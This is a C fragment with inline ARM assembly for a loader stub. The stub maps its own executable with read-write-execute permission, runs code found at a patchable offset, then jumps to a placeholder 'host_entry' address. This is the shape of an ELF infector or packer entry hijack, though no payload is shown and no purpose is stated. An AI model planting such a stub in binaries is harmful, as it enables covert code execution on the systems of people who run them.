__attribute((naked))
void _start(void)
{
    asm (
        ".align	2\n"
        "start:\n"
        "push	{r4, r5, r6, r7, r8, r9, r10, fp, lr}\n"
        "sub	sp, sp, #12\n"
        "mov	r6, r1\n"
        "mov	r10, r0\n"
        "mov	r7, #5\n"
        "ldr	r0, [r1]\n"
        "str	r2, [sp, #4]\n"
        "mov	r1, #0\n"
        "swi     #0\n"
        "cmn	r0, #1\n"
        "mov	r4, r0\n"
        "beq	.L3\n"
        "ldr	fp, .L10\n"
        "mov	r8, r3\n"
        ".LPIC0:\n"
        "add	fp, pc, fp\n"
        "mov	r0, r1\n"
        "mov	r7, #192\n"
        "ldm	fp, {r1, r5}\n"
        "mov	r2, #7\n"
        "mov	r3, #2\n"
        "swi     #0\n"
        "cmn	r0, #1\n"
        "mov	ip, r0\n"
        "beq	.L3\n"
        "mov	r1, r6\n"
        "ldr	r6, [fp, #8]\n"
        "mov	r0, r10\n"
        "add	r6, ip, r6\n"
        "ldr	r2, [sp, #4]\n"
        "mov	r3, r8\n"
        "blx	r6\n"
        "mov	r7, #91\n"
        "mov	r0, r6\n"
        "ldr	r1, [fp]\n"
        "swi     #0\n"
        ".L3:\n"
        "mov	r7, #6\n"
        "mov	r0, r4\n"
        "swi     #0\n"
        "add	sp, sp, #12\n"
        "pop	{r4, r5, r6, r7, r8, r9, r10, fp, pc}\n"
        ".L11:\n"
        ".align	2\n"
        ".L10:\n"
        ".word	.LANCHOR0-(.LPIC0+8)\n"
        ".align	2\n"
        "_thunk_start:\n"
        "push    {r0-r11, lr}\n"
        "ldr     r0, [sp, #52]\n"
        "add     r1, sp, #56\n"
        "add     r2, r1, r0, lsl #2\n"
        "mov     r3, r2\n"
        "add     r2, r2, #4\n"
        "nz:\n"
        "add     r3, r3, #4\n"
        "ldr     r4, [r3]\n"
        "cmp     r4, #0\n"
        "bne     nz\n"
        "add     r3, r3, #4\n"
        "bl      start\n"
        "pop     {r0-r11, lr}\n"
        "ldr     ip, host_entry\n"
        "bx      ip\n"
        ".align  2\n"
        "host_entry:\n"
        ".word   5\n"
        ".align	2\n"
        ".LANCHOR0:\n"
        "code_len:\n"
        ".word	2\n"
        "code_off:\n"
        ".word	1\n"
        "code_entry_off:\n"
        ".word	3\n"
        );
};
